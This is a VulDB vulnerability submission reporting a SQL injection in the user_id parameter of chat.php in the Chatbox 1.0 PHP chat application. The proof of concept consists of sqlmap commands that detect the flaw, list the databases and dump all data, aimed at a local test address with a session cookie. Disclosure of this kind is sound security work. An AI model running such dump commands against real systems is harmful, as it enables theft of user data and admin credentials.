Enviar #636884: shafhasan Chatbox 1.0 1.0 SQL Injectioninformación

Títuloshafhasan Chatbox 1.0 1.0 SQL Injection
DescripciónTitle of the Vulnerability: Chatbox 1.0 | chat.php?user_id= SQL Injection | Found By Maloy Roy Orko Vulnerability Class: SQL Injection Product Name: Chatbox 1.0 CWE:89 Vendor: https://github.com/shafhasan/ Vulnerable Product Link: https://github.com/shafhasan/chatbox Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too. Product & Service Introduction: Chatbox 1.0 using JavaScript and PHP Exploitation POC via SQLmap: (1) Vulnerability Search: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 (2) Database Dumping: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dbs (3) Dumping All Data: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dump Full Detailed POC: https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html
Fuente⚠️ https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html
Usuario
 MaloyRoyOrko (UID 79572)
Sumisión2025-08-18 18:51 (hace 8 meses)
Moderación2025-08-29 08:48 (11 days later)
EstadoAceptado
Entrada de VulDB321859 [shafhasan chatbox hasta 156a39cde62f78532c3265a70eda12c70907e56f /chat.php user_id inyección SQL]
Puntos20

Do you want to use VulDB in your project?

Use the official API to access entries easily!